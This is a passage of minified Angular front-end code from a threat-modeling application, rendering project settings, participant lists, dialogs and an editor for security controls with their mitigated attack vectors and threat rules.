"),m(55,"div",20),s(56,"\n              "),m(57,"mat-list",21),s(58,"\n                "),m(59,"div",22),s(60),oe(61,"translate"),m(62,"button",23),he("click",function(){return be(e),Me(B(2).AddUser())}),oe(63,"translate"),m(64,"mat-icon"),s(65,"add"),u()()(),s(66,"\n                "),ne(67,XSe,17,11,"mat-list-item",24),s(68,"\n              "),u(),s(69,"\n            "),u(),s(70,"\n            "),m(71,"div",25),s(72,"\n              "),ne(73,JSe,24,10,"div",26),s(74,"\n            "),u(),s(75,"\n          "),u(),s(76,"\n        "),u(),s(77,"\n        "),m(78,"div"),s(79,"\n          "),m(80,"h4"),s(81),oe(82,"translate"),u(),s(83,"\n          "),m(84,"div",27),s(85,"\n            "),m(86,"mat-slide-toggle",28),he("change",function(n){return be(e),Me(B(2).OnTestingChanged(n))}),s(87),oe(88,"translate"),u(),s(89,"\n            "),it(90,"br"),s(91,"\n            "),m(92,"mat-slide-toggle",29),he("ngModelChange",function(n){return be(e),Me(B(2).Project.Settings.ThreatActorToAttackScenario=n)}),s(93),oe(94,"translate"),u(),s(95,"\n          "),u(),s(96,"\n        "),u(),s(97,"\n        "),m(98,"div"),s(99,"\n          "),m(100,"mat-accordion",30),s(101,"\n            "),ne(102,tke,17,4,"mat-expansion-panel",31),s(103,"\n          "),u(),s(104,"\n        "),u(),s(105,"\n      ")}if(2&t){const e=B(2);C(2),ke(e.Project.Name),C(11),ke(re(14,23,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.Project.Description),C(6),ke(re(23,25,"properties.Version")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.Project.UserVersion),C(8),V("src",e.Project.Image,nm),C(6),V("ngIf",e.Project.Image),C(18),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),ct("",re(61,27,"properties.Participants")," "),C(2),at("matTooltip",re(63,29,"general.Add")),C(5),V("ngForOf",e.Project.Participants),C(6),V("ngIf",e.selectedUser),C(8),ke(re(82,31,"general.Settings")),C(5),V("checked",e.Project.HasTesting),C(1),ke(re(88,33,"general.TestCases")),C(5),V("ngModel",e.Project.Settings.ThreatActorToAttackScenario),C(1),ke(re(94,35,"dialog.modelinfo.ThreatSourceToAttackScenario")),C(9),V("ngIf",e.GHProject)}}function ake(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ct("\n        ",re(1,1,"status-bar.TasksAndNotes"),"\n      ")}function nke(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ct("\n        ",re(1,1,"dialog.modelchanges.Changes"),"\n      ")}function oke(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ct("\n        ",re(1,1,"dialog.progress.title"),"\n      ")}function rke(t,a){if(1&t){const e=Ye();m(0,"div",1),s(1,"\n  "),m(2,"mat-tab-group",2),he("selectedIndexChange",function(n){return be(e),Me(B().SetSelectedTabIndex(n))})("selectedTabChange",function(){return be(e),Me(Ti(23).UpdateChanges())}),s(3,"\n    "),m(4,"mat-tab"),s(5,"\n      "),ne(6,$Se,2,3,"ng-template",3),s(7,"\n      "),ne(8,ike,106,37,"ng-template",4),s(9,"\n    "),u(),s(10,"\n    "),m(11,"mat-tab"),s(12,"\n      "),ne(13,ake,2,3,"ng-template",3),s(14,"\n      "),it(15,"app-model-tasks"),s(16,"\n    "),u(),s(17,"\n    "),m(18,"mat-tab"),s(19,"\n      "),ne(20,nke,2,3,"ng-template",3),s(21,"\n      "),it(22,"app-model-changes",null,5),s(24,"\n    "),u(),s(25,"\n    "),m(26,"mat-tab"),s(27,"\n      "),ne(28,oke,2,3,"ng-template",3),s(29,"\n      "),m(30,"h4"),s(31),oe(32,"translate"),u(),s(33,"\n      "),it(34,"app-progress-tracker"),s(35,"\n    "),u(),s(36,"\n  "),u(),s(37,"\n"),u()}if(2&t){const e=B();C(2),V("selectedIndex",e.GetSelectedTabIndex()),C(29),za("",re(32,3,"status-bar.progress"),": ",e.GetProgress(),"")}}let w5=(()=>{class t{constructor(e,i,n,r){this.dataService=e,this.theme=i,this.dialog=n,this.locStorage=r,this.refreshNodes=new Tt}ngOnInit(){this.GHProject=this.dataService.SelectedFile,this.Project=this.dataService.Project,this.dataService.GetGHProjectHistory().then(e=>this.commits=e)}OnFileSelected(e){return function(t,a,e,i){return new(e||(e=Promise))(function(r,c){function d(q){try{k(i.next(q))}catch(Y){c(Y)}}function T(q){try{k(i.throw(q))}catch(Y){c(Y)}}function k(q){q.done?r(q.value):function n(r){return r instanceof e?r:new e(function(c){c(r)})}(q.value).then(d,T)}k((i=i.apply(t,a||[])).next())})}(this,void 0,void 0,function*(){if(e.target.files&&e.target.files[0]){const i={maxSizeMB:1,maxWidthOrHeight:700,useWebWorker:!0};try{const n=yield(0,FG.Z)(e.target.files[0],i);let r=new FileReader;r.readAsDataURL(n),r.onload=c=>{this.Project.Image=c.target.result.toString()}}catch(n){console.log(n)}}})}ViewImage(e){this.dialog.OpenViewImageDialog(e)}AddUser(){this.Project.Participants.push({Name:Gi.FindUniqueName("Participant",this.Project.Participants.map(e=>e.Name)),Email:""}),this.selectedUser=this.Project.Participants[this.Project.Participants.length-1]}DeleteUser(e){const i=this.Project.Participants.indexOf(e);i>=0&&(this.Project.Participants.splice(i,1),this.selectedUser==e&&(this.selectedUser=null))}OnTestingChanged(e){e.checked?(this.Project.CreateTesting(),this.refreshNodes.emit()):this.dialog.OpenDeleteObjectDialog(this.Project.GetTesting()).subscribe(i=>{i?(this.Project.DeleteTesting(),this.refreshNodes.emit()):e.source.checked=!0})}GetRemoveBtnLeft(e){return!e||e.width<25?"25px":(e.width-25).toString()+"px"}GetProgress(){if(this.dataService.Project){let e=Object.values(this.dataService.Project.ProgressTracker);return 0==e.length?"0%":(100*e.filter(i=>1==i).length/e.length).toFixed(0)+"%"}}GetSelectedTabIndex(){let e=this.locStorage.Get(si.PAGE_MODELING_MODEL_TAB_INDEX);return null!=e?e:0}SetSelectedTabIndex(e){this.locStorage.Set(si.PAGE_MODELING_MODEL_TAB_INDEX,e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi),Ee(Oa),Ee(Wn),Ee(_r))},t.\u0275cmp=Wt({type:t,selectors:[["app-model-info"]],outputs:{refreshNodes:"refreshNodes"},decls:1,vars:1,consts:[["style","margin: 0 10px;",4,"ngIf"],[2,"margin","0 10px"],["dynamicHeight","",3,"selectedIndex","selectedIndexChange","selectedTabChange"],["mat-tab-label",""],["matTabContent",""],["changes",""],[1,"row"],[1,"col1"],["appearance","fill",2,"width","350px"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","3",3,"spellcheck","ngModel","ngModelChange"],["matInput","",3,"spellcheck","ngModel","ngModelChange"],[1,"col2"],[1,"imgContainer"],[3,"src","click"],["projImg",""],["type","file","accept","image/*",1,"fileInput",3,"change"],["fileUpload",""],["class","removeBtn",3,"left",4,"ngIf"],[1,"uploadBtn"],["mat-mini-fab","","color","primary",3,"click"],[1,"column1"],[1,"prop-list"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["style","margin: 10px 0 10px 10px",4,"ngIf"],[2,"margin-left","20px","margin-bottom","15px"],["color","primary",3,"checked","change"],["color","primary",3,"ngModel","ngModelChange"],[1,"expansion-panel-headers-align"],[4,"ngIf"],[1,"removeBtn"],["mat-icon-button","","color","primary",3,"click"],["matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line",""],[1,"primary-color",3,"href"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin","10px 0 10px 10px"],["appearance","fill",1,"property-form-field"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["matInput","",3,"ngModel","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["matExpansionPanelContent",""],[4,"ngFor","ngForOf"],[2,"text-align","right"],["mat-icon-button","","matTooltipShowDelay","1000",2,"width","20px","height","20px","line-height","20px",3,"matTooltip","click"]],template:function(e,i){1&e&&ne(0,rke,38,5,"div",0),2&e&&V("ngIf",!!i.Project)},styles:['.primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.col1[_ngcontent-%COMP%]{float:left;width:350px}.col2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]{min-width:660px}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.imgContainer[_ngcontent-%COMP%]{position:relative;margin-left:10px}.imgContainer[_ngcontent-%COMP%]   img[_ngcontent-%COMP%]{max-height:230px;height:auto}.imgContainer[_ngcontent-%COMP%]   .uploadBtn[_ngcontent-%COMP%]{position:absolute;top:25px;left:25px;transform:translate(-50%,-50%);-ms-transform:translate(-50%,-50%)}.imgContainer[_ngcontent-%COMP%]   .removeBtn[_ngcontent-%COMP%]{position:absolute;top:25px;transform:translate(-50%,-50%);-ms-transform:translate(-50%,-50%)}.fileInput[_ngcontent-%COMP%]{display:none}']}),t})();function ske(t,a){if(1&t&&(m(0,"div",4),s(1),u()),2&t){const e=B();C(1),ct("\n    ",e.data.textContent,"\n  ")}}function cke(t,a){1&t&&Ir(0)}function lke(t,a){if(1&t&&(bt(0),ne(1,cke,1,0,"ng-container",5),Mt()),2&t){const e=B();C(1),V("ngComponentOutlet",e.data.component)("ngComponentOutletInjector",e.dataInjector)}}function dke(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"button",6),he("click",function(){return be(e),Me(B().data.onPrevious())}),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"button",6),he("click",function(){return be(e),Me(B().data.onNext())}),s(7),oe(8,"translate"),u(),s(9,"\n  "),Mt()}if(2&t){const e=B();C(2),V("disabled",!e.data.canPrevious()),C(1),ke(re(4,4,"tour.prev")),C(3),V("disabled",!e.data.canNext()),C(1),ke(re(8,6,"tour.next"))}}function mke(t,a){if(1&t&&(m(0,"button",9),s(1),u()),2&t){const e=B(2);C(1),ke(e.data.resultFalseText)}}function uke(t,a){if(1&t&&(bt(0),s(1,"\n    "),m(2,"button",7),s(3),u(),s(4,"\n    "),ne(5,mke,2,1,"button",8),s(6,"\n  "),Mt()),2&t){const e=B();C(2),V("disabled",!e.data.resultTrueEnabled())("mat-dialog-close",!0),C(1),ke(e.data.resultTrueText),C(2),V("ngIf",e.data.hasResultFalse)}}function hke(t,a){if(1&t&&(m(0,"button",12),s(1),u()),2&t){const e=B(2);C(1),ke(e.data.resultFalseText)}}function fke(t,a){if(1&t&&(bt(0),s(1,"\n    "),m(2,"button",10),s(3),u(),s(4,"\n    "),ne(5,hke,2,1,"button",11),s(6,"\n  "),Mt()),2&t){const e=B();C(2),V("disabled",!e.data.resultTrueEnabled())("mat-dialog-close",!0),C(1),ke(e.data.resultTrueText),C(2),V("ngIf",e.data.hasResultFalse)}}let _M=(()=>{class t{constructor(e,i,n){this.dialogRef=e,this.data=i,this.injector=n}ngOnInit(){if(this.data.component&&this.data.componentInputData){let e=[];this.data.componentInputData.forEach(i=>{e.push({provide:i.Key,useValue:i.Value})}),this.dataInjector=Ko.create({providers:e,parent:this.injector})}}onKeyDown(e){var i;this.data.canIterate&&!["INPUT","TEXTAREA"].includes(null===(i=document.activeElement)||void 0===i?void 0:i.tagName)&&("ArrowRight"==e.key&&this.data.canNext()?(e.preventDefault(),e.stopPropagation(),this.data.onNext()):"ArrowLeft"==e.key&&this.data.canPrevious()&&(e.preventDefault(),e.stopPropagation(),this.data.onPrevious()))}}return t.\u0275fac=function(e){return new(e||t)(Ee(Gh),Ee(_p),Ee(Ko))},t.\u0275cmp=Wt({type:t,selectors:[["app-two-options-dialog"]],hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,$c)},decls:18,vars:6,consts:[["mat-dialog-title",""],["style","white-space: pre-line",4,"ngIf"],[4,"ngIf"],["align","end"],[2,"white-space","pre-line"],[4,"ngComponentOutlet","ngComponentOutletInjector"],["mat-button","",3,"disabled","click"],["mat-button","","cdkFocusInitial","",3,"disabled","mat-dialog-close"],["mat-button","","mat-dialog-close","",4,"ngIf"],["mat-button","","mat-dialog-close",""],["mat-button","",3,"disabled","mat-dialog-close"],["mat-button","","mat-dialog-close","","cdkFocusInitial","",4,"ngIf"],["mat-button","","mat-dialog-close","","cdkFocusInitial",""]],template:function(e,i){1&e&&(m(0,"h2",0),s(1),u(),s(2,"\n"),m(3,"mat-dialog-content"),s(4,"\n  "),ne(5,ske,2,1,"div",1),s(6,"\n  "),ne(7,lke,2,2,"ng-container",2),s(8,"\n"),u(),s(9,"\n"),m(10,"mat-dialog-actions",3),s(11,"\n  "),ne(12,dke,10,8,"ng-container",2),s(13,"\n  "),ne(14,uke,7,4,"ng-container",2),s(15,"\n  "),ne(16,fke,7,4,"ng-container",2),s(17,"\n"),u()),2&e&&(C(1),ke(i.data.title),C(4),V("ngIf",i.data.textContent),C(2),V("ngIf",i.data.component),C(5),V("ngIf",i.data.canIterate),C(2),V("ngIf",1==i.data.initalTrue),C(2),V("ngIf",0==i.data.initalTrue))},dependencies:[hP,Ri,da,vm,Am,Tm,Em,Xi]}),t})();function pke(t,a){if(1&t){const e=Ye();m(0,"button",19),he("click",function(){return be(e),Me(B(3).control.Name="")}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n    "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function _ke(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",16),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"input",17),he("ngModelChange",function(n){return be(e),Me(B(2).control.Name=n)}),u(),s(7,"\n    "),ne(8,pke,6,3,"button",18),s(9,"\n  "),u()}if(2&t){const e=B(2);C(3),ke(re(4,4,"properties.Name")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.control.Name),C(2),V("ngIf",e.control.Name)}}function gke(t,a){if(1&t&&(m(0,"mat-option",22),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ct("\n        ",e.Name,"\n      ")}}function Cke(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",16),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"mat-select",20),he("selectionChange",function(n){return be(e),Me(B(2).OnControlGroupChanged(n))}),s(7,"\n      "),ne(8,gke,2,2,"mat-option",21),s(9,"\n    "),u(),s(10,"\n  "),u()}if(2&t){const e=B(2);let i;C(3),ke(re(4,4,"general.Group")),C(3),at("matTooltip",null==(i=e.GetControlGroup())?null:i.Name),V("value",e.GetControlGroup()),C(2),V("ngForOf",e.GetControlGroups())}}function yke(t,a){if(1&t&&(m(0,"mat-option",22),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ct("\n          ",e.Name,"\n        ")}}function bke(t,a){if(1&t&&(m(0,"mat-optgroup",23),s(1,"\n        "),ne(2,yke,2,2,"mat-option",21),s(3,"\n      "),u()),2&t){const e=a.$implicit;V("label",e.Name),C(2),V("ngForOf",e.AttackVectors)}}function Mke(t,a){if(1&t&&(m(0,"mat-option",22),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ct("\n          ",e.Name,"\n        ")}}function vke(t,a){if(1&t&&(m(0,"mat-optgroup",23),s(1,"\n        "),ne(2,Mke,2,2,"mat-option",21),s(3,"\n      "),u()),2&t){const e=a.$implicit;V("label",e.Name),C(2),V("ngForOf",e.ThreatRules)}}function Ake(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",24),he("click",function(){const r=be(e).$implicit;return Me(B(2).selectedMitigationTip=r)}),s(1,"\n          "),m(2,"mat-icon",25),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",26),s(6),oe(7,"translate"),u(),s(8,"\n          "),m(9,"div",26),s(10),oe(11,"translate"),u(),s(12,"\n          "),m(13,"button",27),he("click",function(){const r=be(e).$implicit;return Me(B(2).DeleteTip(r))}),oe(14,"translate"),m(15,"mat-icon"),s(16,"delete"),u()(),s(17,"\n        "),u()}if(2&t){const e=a.$implicit,i=B(2);Ct("highlight-light",i.selectedMitigationTip===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedMitigationTip===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(re(7,9,e.Name)),C(4),za("",re(11,11,"properties.LifeCycles"),": ",i.GetLifeCycleNames(e),""),C(3),at("matTooltip",re(14,13,"general.Delete"))}}function Tke(t,a){if(1&t){const e=Ye();m(0,"button",19),he("click",function(){return be(e),Me(B(3).selectedMitigationTip.Name="")}),oe(1,"translate"),s(2,"\n            "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n          "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function Eke(t,a){if(1&t&&(m(0,"td",33),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(3);C(1),ke(re(2,1,i.GetLifeCycleName(e)))}}function Dke(t,a){if(1&t){const e=Ye();m(0,"td",30)(1,"mat-checkbox",34),he("change",function(n){const c=be(e).$implicit;return Me(B(3).SetLifeCycle(c,n))}),u()()}if(2&t){const e=a.$implicit,i=B(3);C(1),V("checked",i.ContainsLifeCycle(e))}}function xke(t,a){if(1&t){const e=Ye();m(0,"div",28),s(1,"\n        "),m(2,"mat-form-field",16),s(3,"\n          "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n          "),m(8,"input",17),he("ngModelChange",function(n){return be(e),Me(B(2).selectedMitigationTip.Name=n)}),u(),s(9,"\n          "),ne(10,Tke,6,3,"button",18),s(11,"\n        "),u(),s(12,"\n        "),m(13,"mat-form-field",2),s(14,"\n          "),m(15,"mat-label"),s(16),oe(17,"translate"),u(),s(18,"\n          "),m(19,"textarea",3),he("ngModelChange",function(n){return be(e),Me(B(2).selectedMitigationTip.Description=n)}),u(),s(20,"\n        "),u(),s(21,"\n        "),m(22,"table",29),s(23,"\n          "),m(24,"tr"),s(25,"\n            "),m(26,"td",30)(27,"strong"),s(28),oe(29,"translate"),u()(),s(30,"\n            "),ne(31,Eke,3,3,"td",31),s(32,"\n          "),u(),s(33,"\n          "),m(34,"tr"),s(35,"\n            "),m(36,"td",30)(37,"strong"),s(38),oe(39,"translate"),u()(),s(40,"\n            "),ne(41,Dke,2,1,"td",32),s(42,"\n          "),u(),s(43,"\n        "),u(),s(44,"\n      "),u()}if(2&t){const e=B(2);C(5),ke(re(6,11,"properties.Name")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedMitigationTip.Name),C(2),V("ngIf",e.selectedMitigationTip.Name),C(6),ke(re(17,13,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedMitigationTip.Description),C(9),ke(re(29,15,"pages.config.control.control")),C(3),V("ngForOf",e.GetLifeCycles()),C(7),ke(re(39,17,"pages.config.control.during")),C(3),V("ngForOf",e.GetLifeCycles())}}function wke(t,a){if(1&t&&(s(0,"\n        "),it(1,"app-attack-vector",36),s(2,"\n      ")),2&t){const e=B().$implicit;C(1),V("canEdit",!1)("attackVector",e)}}function Ike(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n        "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n        "),u(),s(13,"\n      "),u(),s(14,"\n      "),ne(15,wke,3,2,"ng-template",35),s(16,"\n    "),u()),2&t){const e=a.$implicit;C(5),ct("\n          ",re(6,2,"properties.MitigatedAttackVector"),"\n        "),C(4),ct("\n          ",null==e?null:e.GetProperty("Name"),"\n          ")}}function Rke(t,a){if(1&t&&(s(0,"\n        "),it(1,"app-threat-rule",37),s(2,"\n      ")),2&t){const e=B().$implicit;C(1),V("canEdit",!1)("threatRule",e)}}function Ske(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n        "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n        "),u(),s(13,"\n      "),u(),s(14,"\n      "),ne(15,Rke,3,2,"ng-template",35),s(16,"\n    "),u()),2&t){const e=a.$implicit;C(5),ct("\n          ",re(6,2,"properties.MitigatedThreatRule"),"\n        "),C(4),ct("\n          ",null==e?null:e.GetProperty("Name"),"\n          ")}}function kke(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n  "),ne(2,_ke,10,6,"mat-form-field",1),s(3,"\n  "),m(4,"mat-form-field",2),s(5,"\n    "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n    "),m(10,"textarea",3),he("ngModelChange",function(n){return be(e),Me(B().control.Description=n)}),u(),s(11,"\n  "),u(),s(12,"\n  "),ne(13,Cke,11,6,"mat-form-field",1),s(14,"\n  "),m(15,"mat-form-field",2),s(16,"\n    "),m(17,"mat-label"),s(18),oe(19,"translate"),u(),s(20,"\n    "),m(21,"mat-select",4),he("valueChange",function(n){return be(e),Me(B().control.MitigatedAttackVectors=n)}),s(22,"\n      "),ne(23,bke,4,2,"mat-optgroup",5),s(24,"\n    "),u(),s(25,"\n  "),u(),s(26,"\n  "),m(27,"mat-form-field",2),s(28,"\n    "),m(29,"mat-label"),s(30),oe(31,"translate"),u(),s(32,"\n    "),m(33,"mat-select",4),he("valueChange",function(n){return be(e),Me(B().control.MitigatedThreatRules=n)}),s(34,"\n      "),ne(35,vke,4,2,"mat-optgroup",5),s(36,"\n    "),u(),s(37,"\n  "),u(),s(38,"\n  "),m(39,"div",6),s(40,"\n    "),m(41,"div",7),s(42,"\n      "),m(43,"mat-list",8),he("cdkDropListDropped",function(n){be(e);const r=B();return Me(r.drop(n,r.control.MitigationTips))}),s(44,"\n        "),m(45,"div",9),s(46),oe(47,"translate"),m(48,"button",10),he("click",function(){return be(e),Me(B().AddTip())}),oe(49,"translate"),m(50,"mat-icon"),s(51,"add"),u()()(),s(52,"\n        "),ne(53,Ake,18,15,"mat-list-item",11),s(54,"\n      "),u(),s(55,"\n    "),u(),s(56,"\n    "),m(57,"div",12),s(58,"\n      "),ne(59,xke,45,19,"div",13),s(60,"\n    "),u(),s(61,"\n  "),u(),s(62,"\n  "),it(63,"br"),s(64,"\n  "),m(65,"mat-accordion",14),s(66,"\n    "),ne(67,Ike,17,4,"mat-expansion-panel",15),s(68,"\n    "),ne(69,Ske,17,4,"mat-expansion-panel",15),s(70,"\n  "),u(),s(71,"\n  "),it(72,"br"),s(73,"\n"),u()}if(2&t){const e=B();Ct("disable",!e.canEdit),C(2),V("ngIf",e.canEditName),C(5),ke(re(8,24,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.control.Description),C(3),V("ngIf",e.canEditGroup),C(5),ke(re(19,26,"properties.MitigatedAttackVectors")),C(3),V("value",e.control.MitigatedAttackVectors),C(2),V("ngForOf",e.GetAvailableAttackVectorGroups()),C(7),ke(re(31,28,"properties.MitigatedThreatRules")),C(3),V("value",e.control.MitigatedThreatRules),C(2),V("ngForOf",e.GetAvailableThreatRuleGroups()),C(8),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),za("",e.control.Name," ",re(47,30,"general.Tips")," "),C(2),at("matTooltip",re(49,32,"general.Add")),C(5),V("ngForOf",e.control.MitigationTips),C(6),V("ngIf",e.selectedMitigationTip),C(8),V("ngForOf",e.control.MitigatedAttackVectors),C(2),V("ngForOf",e.control.MitigatedThreatRules)}}let T2=(()=>{class t{constructor(e,i,n,r,c,d){this.theme=n,this.dataService=r,this.dialog=c,this.translate=d,this.canEdit=!0,this.canEditName=!1,this.canEditGroup=!1,this.attackVectorGroups=null,this.threatRuleGroups=null,e&&(this.control=e,this.canEdit=!1),null!=i&&(this.canEdit=this.canEditName=this.canEditGroup=i.Value)}get control(){return this._control}set control(e){this._control=e,this.attackVectorGroups=null,this.selectedMitigationTip=null}ngOnInit(){}GetAvailableAttackVectorGroups(){if(null!=this.attackVectorGroups)return this.attackVectorGroups;this.attackVectorGroups=[];let e=i=>{var n,r;(null===(n=i.AttackVectors)||void 0===n?void 0:n.length)>0&&this.attackVectorGroups.push({Name:i.Name,AttackVectors:i.AttackVectors}),(null===(r=i.SubGroups)||void 0===r?void 0:r.length)>0&&i.SubGroups.forEach(c=>e(c))};return e(this.dataService.Config.ThreatLibrary),this.attackVectorGroups}GetAvailableThreatRuleGroups(){if(null!=this.threatRuleGroups)return this.threatRuleGroups;this.threatRuleGroups=[];let 